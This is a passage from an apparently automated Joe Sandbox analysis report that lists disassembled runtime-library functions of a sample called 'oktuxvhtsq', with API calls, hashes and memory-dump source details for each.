                                  Yara matches
                                  Similarity
                                  • API ID: HeapProcess
                                  • String ID:
                                  • API String ID: 54951025-0
                                  • Opcode ID: 9760e16043c4a12cb64540d7b66df2d43cf2b565a5555d1ca94f245d37fb0dfe
                                  • Instruction ID: d2a306102a4eb73d72ce0a1351552c83cad2a35487ed633b62112504c5744cf3
                                  • Opcode Fuzzy Hash: 9760e16043c4a12cb64540d7b66df2d43cf2b565a5555d1ca94f245d37fb0dfe
                                  • Instruction Fuzzy Hash: 12A0113020022A8BA3008F32AA8820C3AE8AA022C038800B8A008C0020EAB08082AA08
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0042B1C8 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0042AE81: CreateFileW.KERNEL32(?,00000000,?,0042B271,?,?,00000000), ref: 0042AE9E
                                  • GetLastError.KERNEL32 ref: 0042B2DC
                                  • __dosmaperr.LIBCMT ref: 0042B2E3
                                  • GetFileType.KERNEL32 ref: 0042B2EF
                                  • GetLastError.KERNEL32 ref: 0042B2F9
                                  • __dosmaperr.LIBCMT ref: 0042B302
                                  • CloseHandle.KERNEL32(00000000), ref: 0042B322
                                  • CloseHandle.KERNEL32(004228FC), ref: 0042B46F
                                  • GetLastError.KERNEL32 ref: 0042B4A1
                                  • __dosmaperr.LIBCMT ref: 0042B4A8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                  • String ID: H
                                  • API String ID: 4237864984-2852464175
                                  • Opcode ID: c94d0fe4a010d67859a834d3db079b84dcafb6ea516ae879c2154f7f715fd7c0
                                  • Instruction ID: c6bf9c4d59582f99a9defb0eefa8473981649fc615e6736c6fc32d13d1991b4d
                                  • Opcode Fuzzy Hash: c94d0fe4a010d67859a834d3db079b84dcafb6ea516ae879c2154f7f715fd7c0
                                  • Instruction Fuzzy Hash: F0A11632B101249FCF19EF68EC95BAE3BA0EB46314F55015EF8119F391D7399812CB9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00408EE0 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 74COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00408F14
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Exception@8Throw
                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                  • API String ID: 2005118841-1866435925
                                  • Opcode ID: 80f0ca34a17e9dd3b1b8a0163759b0a036d4405b53b4a39d09bf88d500764d19
                                  • Instruction ID: 7768beefd3b9d81389688d2f74221988609935be8cfa570b028e8557fdeb0d23
                                  • Opcode Fuzzy Hash: 80f0ca34a17e9dd3b1b8a0163759b0a036d4405b53b4a39d09bf88d500764d19
                                  • Instruction Fuzzy Hash: 64217670A10208ABC704EBD1D952FAEB375AF44704F14815EB6017B2C1DAB8AE41DB99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040A610 Relevance: 13.6, APIs: 9, Instructions: 103COMMON
                                  Download Yara Rule
                                  APIs
                                  • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 0040A6A2
                                  • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 0040A6AE
                                  • char_traits.LIBCPMTD ref: 0040A6BA
                                  • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 0040A6EA
                                  • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 0040A6F6
                                  • char_traits.LIBCPMTD ref: 0040A6FF
                                  • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 0040A710
                                  • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 0040A71C
                                  • char_traits.LIBCPMTD ref: 0040A725
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Base::Concurrency::details::ContextIdentityQueueWork$char_traits
                                  • String ID:
                                  • API String ID: 1941806930-0
                                  • Opcode ID: 4817d718088fd4d53587460149760814ceb1a3b7d9050faf0ea0c3b86eb10381
                                  • Instruction ID: 50578ec6fd0a0e1eef66769a6c5bbe0355a8e492feb8f5f6c459b3391c3768fb
                                  • Opcode Fuzzy Hash: 4817d718088fd4d53587460149760814ceb1a3b7d9050faf0ea0c3b86eb10381
                                  • Instruction Fuzzy Hash: EF411DB690010CEFCB04EF99D992E9E77B5AF44304F10816EF915AB292DB34AE10DB95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004031B0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 62COMMON
                                  Download Yara Rule
                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 004031BB
                                  • int.LIBCPMTD ref: 004031CD
                                    • Part of subcall function 00404D30: std::_Lockit::_Lockit.LIBCPMT ref: 00404D46
                                    • Part of subcall function 00404D30: std::_Lockit::~_Lockit.LIBCPMT ref: 00404D70
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0040325E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                  • String ID: Ns@
                                  • API String ID: 593203224-4153086589
                                  • Opcode ID: 28a4142137bdebbdf4e82423705b913c805085c86edb13fc50ee6e05ba048468
                                  • Instruction ID: 2eafad9657542f169d391e17d649bba32b6efe15bf257d4929166bfee1f9b8bf
                                  • Opcode Fuzzy Hash: 28a4142137bdebbdf4e82423705b913c805085c86edb13fc50ee6e05ba048468
                                  • Instruction Fuzzy Hash: 2321CB74D00108EBCB04EF95D981AAEBBB5AF48305F2082AAE51677290DB34AF45DB95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040D8DF Relevance: 12.1, APIs: 8, Instructions: 51COMMON
                                  Download Yara Rule
                                  APIs
                                  • __EH_prolog3.LIBCMT ref: 0040D8E6
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0040D8F0
                                  • int.LIBCPMTD ref: 0040D907
                                    • Part of subcall function 00404D30: std::_Lockit::_Lockit.LIBCPMT ref: 00404D46
                                    • Part of subcall function 00404D30: std::_Lockit::~_Lockit.LIBCPMT ref: 00404D70
                                  • codecvt.LIBCPMT ref: 0040D92A
                                  • std::bad_alloc::bad_alloc.LIBCMTD ref: 0040D939
                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040D947
                                  • std::_Facet_Register.LIBCPMT ref: 0040D966
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0040D96F
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcodecvtstd::bad_alloc::bad_alloc
                                  • String ID:
                                  • API String ID: 3310255495-0
                                  • Opcode ID: 1d619c2f745f45a6baccf3455fde3343e93fde0b3c633d8273bc50defaf7ab41
                                  • Instruction ID: fa7badf3fe74694c1b8d33171ecc7ee350e1e21c3124721cbe2da089c7b316c2
                                  • Opcode Fuzzy Hash: 1d619c2f745f45a6baccf3455fde3343e93fde0b3c633d8273bc50defaf7ab41
                                  • Instruction Fuzzy Hash: 30018E75D001188BCB05EBA1D852AAEB735AF44728F14013FE511772D1DF7CA9099B99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00406040 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 368COMMON
                                  Download Yara Rule
                                  APIs
                                  • _strcspn.LIBCMT ref: 004060F0
                                  • _strcspn.LIBCMT ref: 0040613D
                                  • ctype.LIBCPMTD ref: 00406197
                                  • std::ios_base::width.LIBCPMTD ref: 0040644F
                                    • Part of subcall function 00404CE0: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00404CEA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _strcspn$Base::Concurrency::details::ContextIdentityQueueWorkctypestd::ios_base::width
                                  • String ID: @$LB
                                  • API String ID: 3152856973-1375617125
                                  • Opcode ID: 80145f3b76361c8076c33eda7ce22009cf8cbe73f6cc5d4a5239d4d4d7e53428
                                  • Instruction ID: bc422bdbcaa8cb06cdf63b12857e54ab20cf6e9b31cfefa757430ccf7ceac025
                                  • Opcode Fuzzy Hash: 80145f3b76361c8076c33eda7ce22009cf8cbe73f6cc5d4a5239d4d4d7e53428
                                  • Instruction Fuzzy Hash: 17E17CB1900108DFCB08DF99D991AEEB7B5BF88304F14816EF906B7291D738AE50CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00420BD4 Relevance: 10.8, APIs: 7, Instructions: 329COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _strrchr
                                  • String ID:
                                  • API String ID: 3213747228-0
                                  • Opcode ID: 8777c7e036783cad7e172ffb2104c5ea53e3e9d3b58f625a6405791c25ec6152
                                  • Instruction ID: 4ae564abd4401b14d1556cc28d52b6bda4f74ee5d9e8f639f3b431d32c8f2938
                                  • Opcode Fuzzy Hash: 8777c7e036783cad7e172ffb2104c5ea53e3e9d3b58f625a6405791c25ec6152
                                  • Instruction Fuzzy Hash: D2B19672B012759FDB158F68EC81BAFBBE1EF15310F644557E804AB383D278A841C7A8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00428A87 Relevance: 9.3, APIs: 6, Instructions: 292COMMONLIBRARYCODE
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ffa132ca06f9448c5b0b5752e8da5a1b2a77fedf10e59420a88dea36fc394bb0
                                  • Instruction ID: f80cafc43d9f947f0d513d4035dff93086ecd6a95d1b82031839b0eea99505e7
                                  • Opcode Fuzzy Hash: ffa132ca06f9448c5b0b5752e8da5a1b2a77fedf10e59420a88dea36fc394bb0
                                  • Instruction Fuzzy Hash: 91B12774B01225AFDB11DF99E840BAE7BB0AF95314F94415EE4009B382CB789D46CBAD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040A780 Relevance: 9.1, APIs: 6, Instructions: 86COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 004071B0: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 004071C1
                                    • Part of subcall function 004071B0: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 004071CE
                                  • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 0040A7A3
                                    • Part of subcall function 0040A610: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 0040A6A2
                                    • Part of subcall function 0040A610: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 0040A6AE
                                    • Part of subcall function 0040A610: char_traits.LIBCPMTD ref: 0040A6BA
                                    • Part of subcall function 0040A610: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 0040A6EA
                                    • Part of subcall function 0040A610: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 0040A6F6
                                    • Part of subcall function 0040A610: char_traits.LIBCPMTD ref: 0040A6FF
                                  • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 0040A825
                                  • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 0040A831
                                  • char_traits.LIBCPMTD ref: 0040A83D
                                  • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 0040A850
                                  • char_traits.LIBCPMTD ref: 0040A859
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Base::Concurrency::details::ContextIdentityQueueWork$char_traits
                                  • String ID:
                                  • API String ID: 1941806930-0
                                  • Opcode ID: e1636d0c4656c5475909e1116616c83ce152584eb02b43e59d5d082885e95d5b
                                  • Instruction ID: 902bc6cb4ac67fbffe6b799e0c1bf63c6b256c6cce2751f125fc2759a57736f3
                                  • Opcode Fuzzy Hash: e1636d0c4656c5475909e1116616c83ce152584eb02b43e59d5d082885e95d5b
                                  • Instruction Fuzzy Hash: C33143B5A04108EFCB04EF99DD92D9E77B5AF84304F14816DF505AB2D1CB34AE10DB95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00403030 Relevance: 9.1, APIs: 6, Instructions: 62COMMON
                                  Download Yara Rule
                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0040303B
                                  • int.LIBCPMTD ref: 0040304D
                                    • Part of subcall function 00404D30: std::_Lockit::_Lockit.LIBCPMT ref: 00404D46
                                    • Part of subcall function 00404D30: std::_Lockit::~_Lockit.LIBCPMT ref: 00404D70
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 004030DE
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                  • String ID:
                                  • API String ID: 593203224-0
                                  • Opcode ID: 054e30c82994c5b41a2be6d12de953d42570f3128e780692cf4dd7372a83e31b
                                  • Instruction ID: 1e06838a5794ff3d00713b8d08869a75be828dc6c6a671bc93b0d18cb027d70e
                                  • Opcode Fuzzy Hash: 054e30c82994c5b41a2be6d12de953d42570f3128e780692cf4dd7372a83e31b
                                  • Instruction Fuzzy Hash: B7210E74D00208EBCB04DF95D881AEEBBB4EB48305F20826AE91577394DB34AF41DB95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00403270 Relevance: 9.1, APIs: 6, Instructions: 62COMMON
                                  Download Yara Rule
                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0040327B
                                  • int.LIBCPMTD ref: 0040328D
                                    • Part of subcall function 00404D30: std::_Lockit::_Lockit.LIBCPMT ref: 00404D46
                                    • Part of subcall function 00404D30: std::_Lockit::~_Lockit.LIBCPMT ref: 00404D70
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0040331E
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                  • String ID:
                                  • API String ID: 593203224-0
                                  • Opcode ID: 390f9535042092ffef96d26aab171cb12a6a63391c85627784c44cf0f1f9f271
                                  • Instruction ID: f14eca40ba20ec4c4653a20a591432918aae2fe78fd1373e7fea217ff8a958eb
                                  • Opcode Fuzzy Hash: 390f9535042092ffef96d26aab171cb12a6a63391c85627784c44cf0f1f9f271
                                  • Instruction Fuzzy Hash: 7921C074D00108EBCB04EFD5D5819EEBBB5AF48305F2082AAE91577390DB34AF45DB95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00403330 Relevance: 9.1, APIs: 6, Instructions: 61COMMON
                                  Download Yara Rule
                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0040333B
                                  • int.LIBCPMTD ref: 0040334D
                                    • Part of subcall function 00404D30: std::_Lockit::_Lockit.LIBCPMT ref: 00404D46
                                    • Part of subcall function 00404D30: std::_Lockit::~_Lockit.LIBCPMT ref: 00404D70
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 004033DB
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                  • String ID:
                                  • API String ID: 593203224-0
                                  • Opcode ID: bb25dca8c21eabe31973e422c0a230592a0ab11695ad146a58683e1482870424
                                  • Instruction ID: 730fd3d8916e046cc550bf57b38d08ca25a081fa70df42b518c58a2996071f8e
                                  • Opcode Fuzzy Hash: bb25dca8c21eabe31973e422c0a230592a0ab11695ad146a58683e1482870424
                                  • Instruction Fuzzy Hash: 88211074D00108EBCB04DF95D481AEEBBB4EF48304F20856AE915B7390DB74AF41DB95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004142D7 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • GetLastError.KERNEL32(?,?,004142CE,00410E32), ref: 004142E5
                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 004142F3
                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0041430C
                                  • SetLastError.KERNEL32(00000000,?,004142CE,00410E32), ref: 0041435E
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLastValue___vcrt_
                                  • String ID:
                                  • API String ID: 3852720340-0
                                  • Opcode ID: 45708c2d7b4856b79ccb0322211090b0dc1c061b295de7347df7c733d87a2358
                                  • Instruction ID: 8509f2b2f643eb6da479c17c4eccd590ee7246626f0016df3b8a30c8b735b793
                                  • Opcode Fuzzy Hash: 45708c2d7b4856b79ccb0322211090b0dc1c061b295de7347df7c733d87a2358
                                  • Instruction Fuzzy Hash: CB0147363083116EA62427767C899E72754DFD27B8B20023FFA30952E0EF699CD3568D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040CF06 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 136COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • __Getcvt.LIBCPMT ref: 0040CF5E
                                  • MultiByteToWideChar.KERNEL32(k)@,00000009,?,00000002,?,00000000), ref: 0040CFAC
                                  • MultiByteToWideChar.KERNEL32(k)@,00000009,00000001,00000001,?,00000000), ref: 0040D01E
                                  • MultiByteToWideChar.KERNEL32(k)@,00000009,00000001,00000001,?,00000000), ref: 0040D046
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharMultiWide$Getcvt
                                  • String ID: k)@
                                  • API String ID: 3195005509-2304320424
                                  • Opcode ID: b9dd068e57f5341b742b4849332f2140f9481da646387e3cdc0037eabdec8818
                                  • Instruction ID: cc1d0dba6b3b34ddb9ee8b734f2fefd702c856f6dab0a067d9e499ef6c51393f
                                  • Opcode Fuzzy Hash: b9dd068e57f5341b742b4849332f2140f9481da646387e3cdc0037eabdec8818
                                  • Instruction Fuzzy Hash: 2241B131600346EFDB218F65C880B6BBBFAAF41314F14467BF851AB2D0D779A845CB5A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041A214 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,D85DCB61,?,?,00000000,0042DCC1,000000FF,?,0041A1AE,?,?,0041A182,?), ref: 0041A249
                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,00000000,0042DCC1,000000FF,?,0041A1AE,?,?,0041A182,?), ref: 0041A25B
                                  • FreeLibrary.KERNEL32(00000000,?,00000000,0042DCC1,000000FF,?,0041A1AE,?,?,0041A182,?), ref: 0041A27D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressFreeHandleLibraryModuleProc
                                  • String ID: CorExitProcess$mscoree.dll
                                  • API String ID: 4061214504-1276376045
                                  • Opcode ID: 733298ac588f38aa2e65a57226c6cc0f45604df62740eebb700d0fbe2d802aad
                                  • Instruction ID: 18aa333287d6022db56daf034ee4830fea0bb97504dcdd700c4b7dc8220636e3
                                  • Opcode Fuzzy Hash: 733298ac588f38aa2e65a57226c6cc0f45604df62740eebb700d0fbe2d802aad
                                  • Instruction Fuzzy Hash: 4001A271A40625EFDB118F51DC09BAEBBB8FB04B11F000A36F811A2390DB799910CA58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040E29D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 148COMMON
